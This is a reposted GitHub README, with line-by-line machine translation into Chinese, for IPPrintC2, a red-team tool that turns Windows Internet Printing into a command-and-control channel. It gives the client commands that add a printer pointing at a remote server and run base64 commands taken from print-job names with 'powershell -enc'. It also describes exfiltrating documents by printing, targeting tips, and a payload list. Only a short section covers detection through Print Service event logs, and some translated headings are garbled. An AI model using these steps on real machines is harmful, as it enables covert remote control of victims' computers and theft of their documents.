PoC for using MS Windows printers for persistence / command and control via Internet Printing

IoT 6个月前 admin
95 0 0

IPPrint C2

TL;DR TL;博士

A Proof-of-Concept for using Microsoft Windows printers for persistence / command and control via Internet Printing.
使用 Microsoft Windows 打印机通过 Internet 打印进行持久性/命令和控制的概念验证。

Printing systems are an often overlooked target for attackers looking to establish command and control (C2) channels on a victim’s network. An attacker can abuse the operating system’s printing system to add and remove printers and create and manipulate printing jobs to achieve full C2 communication. We have developed a complete proof of concept of such a solution that we have successfully tested in real-world red teaming exercises. By understanding the approach taken in this specific abuse of printing systems, we can take steps to secure them and prevent them from being exploited by malicious actors.
对于希望在受害者网络上建立命令和控制 (C2) 通道的攻击者来说,打印系统是一个经常被忽视的目标。攻击者可以滥用操作系统的打印系统来添加和删除打印机,并创建和操纵打印作业,以实现完整的 C2 通信。我们已经开发了这种解决方案的完整概念验证,并在现实世界的红队演习中成功进行了测试。通过了解在这种特定滥用打印系统时所采取的方法,我们可以采取措施保护它们并防止它们被恶意行为者利用。

Background story 背景故事

The idea was to create a basic C2 for engagements using built-in Windows functionalities, which can then be used to execute arbitrary commands or load a preferable C2 solution (https://howto.thec2matrix.com/).
这个想法是使用内置的 Windows 功能为参与创建一个基本的 C2,然后可用于执行任意命令或加载首选的 C2 解决方案 (https://howto.thec2matrix.com/)。

A feature in Microsoft Windows was used that enables to install of shared printers through Internet Printing Protocol (https://en.wikipedia.org/wiki/Internet_Printing_Protocol). Regular users can add a printer without administrative privileges as long there is no driver installation, so usage of existing drivers was mandatory. A default “Microsoft Print to PDF” driver was used.
使用了 Microsoft Windows 中的一项功能,该功能允许通过 Internet 打印协议 (https://en.wikipedia.org/wiki/Internet_Printing_Protocol) 安装共享打印机。只要没有安装驱动程序,普通用户就可以在没有管理权限的情况下添加打印机,因此必须使用现有驱动程序。使用了默认的“Microsoft 打印到 PDF”驱动程序。

The commands that will be executed are sent from the C2 Internet Printing server to the printer’s document queue as base64-encoded document names. With basic PowerShell, clients can then obtain these document names from the queue and execute commands on themselves. Also, clients can print documents to this printer that will be saved to a file on the C2 server which is useful to fetch results from executed commands or to exfiltrate documents. An additional plus was that adding a printer shared on the Internet passed through a couple of web proxy solutions commonly used in enterprises. Tested on Windows Server 2019 and Windows 10 / 11.
将执行的命令作为 base64 编码的文档名称从 C2 Internet 打印服务器发送到打印机的文档队列。使用基本 PowerShell,客户端可以从队列中获取这些文档名称,并自行执行命令。此外,客户端可以将文档打印到此打印机,这些文档将保存到 C2 服务器上的文件中,这对于从执行的命令中获取结果或泄露文档非常有用。另一个优点是,添加在 Internet 上共享的打印机会通过企业中常用的几个 Web 代理解决方案。在 Windows Server 2019 和 Windows 10 / 11 上进行了测试。

Server 服务器

Internet Information Services, Windows Print Services, Print Server and Internet Printing are required to set up a C2 server. Anonymous authentication is enabled on Internet Information Services so clients can obtain the document queue without authentication and the owner of print jobs is the IUSR user account. The server also installs the shared printer for itself and uses it to submit jobs to its print queue, otherwise, the document owner would not be the IUSR user and clients would not be able to obtain the document name from the queue.
设置 C2 服务器需要 Internet Information Services、Windows Print Services、Print Server 和 Internet Print。在 Internet Information Services 上启用匿名身份验证,因此客户端无需身份验证即可获取文档队列,并且打印作业的所有者是 IUSR 用户帐户。服务器还会为自己安装共享打印机,并使用它来将作业提交到其打印队列,否则,文档所有者将不是 IUSR 用户,客户端将无法从队列中获取文档名称。

The installation script is provided in this repository and should work. Check if you can access your printer to make sure everything went well:
安装脚本在此存储库中提供,应该可以正常工作。检查您是否可以访问您的打印机,以确保一切顺利:

http(s)://<IP or DNS>/printers/
http(s)://<IP or DNS>/printers/<printername>/.printer

Once all is set up, run the IPPrintC2.ps1 and enter commands that you would like to execute on the client through the document name. The document name has its length limitations, so if the length of the base64 encoded command in the document name is larger than 255 characters, it gets split to several documents in the print queue. This is handled by the IPPrintC2 script while the concatenation is handled by the client.
完成所有设置后,运行 IPPrintC2.ps1 并通过文档名称输入要在客户端上执行的命令。文档名称有其长度限制,因此,如果文档名称中 base64 编码命令的长度大于 255 个字符,则该命令将被拆分为打印队列中的多个文档。这由 IPPrintC2 脚本处理,而串联由客户端处理。

PS C:\Users\administrator\Desktop> .\IPPrintC2.ps1
IPPrint C2 Server
1. Select the default C2 printer.
2. Enter the command to execute on the client through the document name.
3. Enter the path of the PowerShell script you would like to execute.
4. Exfiltrate remote documents.
5. Read IIS logs.
6. Clear the print queue.
7. Kill all clients.
8. Quit.
What do you want to do?: 2
To print output of multiple commands, use this: [scriptblock]$x={whoami;hostname;ipconfig};$x.invoke()
Enter commands you wish to execute: [scriptblock]$x={whoami /all;hostname};$x.invoke()

You can also load PowerShell scripts. Keep the scripts simple as they may take a while to get split and sent to the document queue. Also, the scripts are one-off since the print queue eventually gets cleared and the character limit is 32767.
还可以加载 PowerShell 脚本。保持脚本简单,因为它们可能需要一段时间才能拆分并发送到文档队列。此外,脚本是一次性的,因为打印队列最终会被清除,字符限制为 32767。

OpSec OpSec(光学安全)

  • Be sure to use the whitelist approach for the network segments you are targeting, otherwise anyone can access your print queue.
    请务必对目标网段使用白名单方法,否则任何人都可以访问您的打印队列。
  • It is recommended to set up SSL for obvious reasons. The easiest way to setup SSL:
    出于显而易见的原因,建议设置 SSL。设置SSL的最简单方法:

Client 客户

To execute commands on the client, the addition of a printer and a persistent job to obtain and execute commands is needed. Examples:
若要在客户端上执行命令,需要添加打印机和持久性作业来获取和执行命令。例子:

PS C:\Users\regular> Add-Printer XPS -PortName https://somewhere.on.azure.com/printers/af/.printer -DriverName "Microsoft Print To PDF"

PS C:\Users\regular> Get-Printer XPS |fl


Name                         : XPS
ComputerName                 :
Type                         : Local
ShareName                    :
PortName                     : https://somewhere.on.azure.com/printers/af/.printer
DriverName                   : Microsoft Print To PDF
Location                     :
Comment                      :
SeparatorPageFile            :
PrintProcessor               : winprint
Datatype                     : RAW
Shared                       : False
Published                    : False
DeviceType                   : Print
PermissionSDDL               :
RenderingMode                :
KeepPrintedJobs              : False
Priority                     : 1
DefaultJobPriority           : 0
StartTime                    : 0
UntilTime                    : 0
PrinterStatus                : Normal
JobCount                     : 0
DisableBranchOfficeLogging   :
BranchOfficeOfflineLogSizeMB :
WorkflowPolicy               :

PS C:\Users\regular> ((get-printjob XPS).documentname -join "")
WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA==

PS C:\Users\regular> powershell -enc ((get-printjob XPS).documentname -join "")

USER INFORMATION
----------------

User Name               SID
======================= ==============================================
desktop-printingfun\regular S-1-5-21-1829223926-2430627930-1039442773-1002


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users          Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

DESKTOP-PRINTINGFUN

Several payloads are available in the repository.
存储库中提供了多个有效负载。

Detection 检波

As always, the best way is to centrally monitor the logs of the infrastructure on your Security Operations Center / Security Information and Event Management solutions and use command-line logging / PowerShell Transcription.
与往常一样,最好的方法是集中监视安全运营中心/安全信息和事件管理解决方案上的基础结构日志,并使用命令行日志记录/PowerShell 转录。

By default, printer installation is not logged in the Event Viewer, but this can be enabled:
默认情况下,打印机安装不会记录在事件查看器中,但可以启用:

With Print Service Operational log enabled you can monitor the installation of printers and additional information with Event ID’s 300 and 307.
启用打印服务操作日志后,可以使用事件 ID 的 300 和 307 监视打印机的安装和其他信息。

Log Name:      Microsoft-Windows-PrintService/Operational
Source:        Microsoft-Windows-PrintService
Date:          6/28/2022 9:15:42 AM
Event ID:      300
Task Category: Adding a printer
Level:         Information
Keywords:      Classic Spooler Event,Printer
User:          DESKTOP-PRINTINGFUN\regular
Computer:      DESKTOP-PRINTINGFUN
Description:
Printer XPS was created. No user action is required.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PrintService" Guid="{747ef6fd-e535-4d16-b510-42c90f6873a1}" />
    <EventID>300</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>4</Task>
    <Opcode>11</Opcode>
    <Keywords>0x4000000000000820</Keywords>
    <TimeCreated SystemTime="2022-06-28T07:15:42.7786608Z" />
    <EventRecordID>6</EventRecordID>
    <Correlation />
    <Execution ProcessID="2512" ThreadID="2824" />
    <Channel>Microsoft-Windows-PrintService/Operational</Channel>
    <Computer>DESKTOP-PRINTINGFUN</Computer>
    <Security UserID="S-1-5-21-1829223926-2430127930-1039111773-1002" />
  </System>
  <UserData>
    <PrinterCreated xmlns="http://manifests.microsoft.com/win/2005/08/windows/printing/spooler/core/events">
      <Param1>XPS</Param1>
    </PrinterCreated>
  </UserData>
</Event>
Log Name:      Microsoft-Windows-PrintService/Operational
Source:        Microsoft-Windows-PrintService
Date:          6/28/2022 11:15:16 AM
Event ID:      307
Task Category: Printing a document
Level:         Information
Keywords:      Classic Spooler Event,Document Print Job
User:          DESKTOP-PRINTINGFUN\regular
Computer:      DESKTOP-PRINTINGFUN
Description:
Document 4, Print Document owned by regular on \\DESKTOP-PRINTINGFUN was printed on XPS through port https://somewhere.on.azure.com/printers/printers/af/.printer.  Size in bytes: 69009. Pages printed: 1. No user action is required.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PrintService" Guid="{747ef6fd-e535-4d16-b510-42c90f6873a1}" />
    <EventID>307</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>26</Task>
    <Opcode>11</Opcode>
    <Keywords>0x4000000000000840</Keywords>
    <TimeCreated SystemTime="2022-06-28T09:15:16.1668381Z" />
    <EventRecordID>97</EventRecordID>
    <Correlation />
    <Execution ProcessID="2512" ThreadID="1848" />
    <Channel>Microsoft-Windows-PrintService/Operational</Channel>
    <Computer>DESKTOP-PRINTINGFUN</Computer>
    <Security UserID="S-1-5-21-1829223926-2430127930-1039111773-1002" />
  </System>
  <UserData>
    <DocumentPrinted xmlns="http://manifests.microsoft.com/win/2005/08/windows/printing/spooler/core/events">
      <Param1>4</Param1>
      <Param2>Print Document</Param2>
      <Param3>regular</Param3>
      <Param4>\\DESKTOP-PRINTINGFUN</Param4>
      <Param5>XPS</Param5>
      <Param6>https://somewhere.on.azure.com/printers/af/.printer</Param6>
      <Param7>69009</Param7>
      <Param8>1</Param8>
    </DocumentPrinted>
  </UserData>
</Event>

Files 文件

  • Install/InstallScript.ps1 – PowerShell script that installs the prerequisites. You should set up SSL yourself
    Install/InstallScript.ps1 – 安装必备组件的 PowerShell 脚本。您应该自己设置 SSL
  • Server/IPPrintC2.ps1 – PowerShell script for IPPrintC2 that you run on the server hosting Print Services
    Server/IPPrintC2.ps1 – 在托管打印服务的服务器上运行的 IPPrintC2 的 PowerShell 脚本
  • Payloads/payloads.txt – basic list of payloads to get started
    Payloads/payloads.txt – 要开始使用的有效负载的基本列表

Notes 笔记

  • The C2 currently works as one-to-all. You can set up additional printers on the C2 server, modify the IPPrintC2.ps1 script, and run multiple instances
    C2 目前以一对多的方式工作。您可以在 C2 服务器上设置其他打印机、修改 IPPrintC2.ps1 脚本以及运行多个实例
  • Exfiltration of documents needs improvement as it currently works with ASCII text-based files
    文档的外泄需要改进,因为它目前适用于基于 ASCII 文本的文件
  • Automatic cleaning of documents printed by clients requires improvements
    自动清理客户打印的文档需要改进
  • The IPPrintC2 is provided as-is
    IPPrintC2 按原样提供

In the process of writing this simple C2, it was discovered that a somewhat similar technique was also used by WithSecure and published earlier. Not only that, but the name (PrintC2) also was the same, so it was changed to IPPrintC2. Nevertheless, due to the differences and different initial mindset/purpose we decided to release our work.
在编写这个简单的 C2 的过程中,发现 WithSecure 也使用了一种有点类似的技术,并且更早发布。不仅如此,名称(PrintC2)也相同,因此更改为IPPrintC2。然而,由于差异和不同的初始心态/目的,我们决定发布我们的工作。

References 引用

Credits 学分

  • Author: @kr3bz 作者: @kr3bz

Happy printing! 祝您打印愉快!

原文始发于Github:PoC for using MS Windows printers for persistence / command and control via Internet Printing

版权声明:admin 发表于 2024年5月18日 上午10:08。
转载请注明:PoC for using MS Windows printers for persistence / command and control via Internet Printing | CTF导航

相关文章